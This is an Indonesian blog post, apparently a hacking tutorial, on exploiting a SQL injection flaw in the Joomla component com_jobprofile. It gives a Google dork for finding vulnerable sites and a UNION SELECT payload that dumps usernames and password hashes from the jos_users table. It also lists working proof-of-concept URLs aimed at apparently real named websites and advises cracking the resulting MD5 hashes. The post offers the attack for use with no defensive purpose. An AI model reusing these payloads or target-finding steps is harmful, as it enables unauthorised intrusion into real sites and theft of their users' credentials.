Post kali ini akan membahas bagaimana mengexploitasi BUG sql.
Untuk cms kita kali ini terdapat pada website Joomla yang terdapat pada component jobprofile.
Perlu di ingat untuk Dan password yang di dapat nantinya masih berupa md5, jadi diperlukan usaha untuk mengencrytnya menjadi sebuah password nyata.
Silahkan search saja di internet berbagai situs crack md5 .
Baik... langsung saja kita buka google & search dork berikut :
inurl:"index.php?option=com_jobprofile"
Misal dari pencarian diatas kita dapatkan salah satu target :
http://target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=bla..bla..bla
Kemudian hapuslah semua link setelah kode id= atau yang bewarna merah tersebut.
Kemudian ganti dengan :
-1+union+all+select+1,concat_ws(0x3a,username,activation),3,4,5,6,7,8,9+from+jos_users--
Sehingga nantinya menjadi :
http://target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
Ni saya kasih POC nya biar langsung paham.
http://e-job.com/site/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,activation),3,4,5,6,7,8,9+from+jos_users--
http://www.astellas.cz/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Semogga bermanfaat gan :*
0 komentar:
Posting Komentar
Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !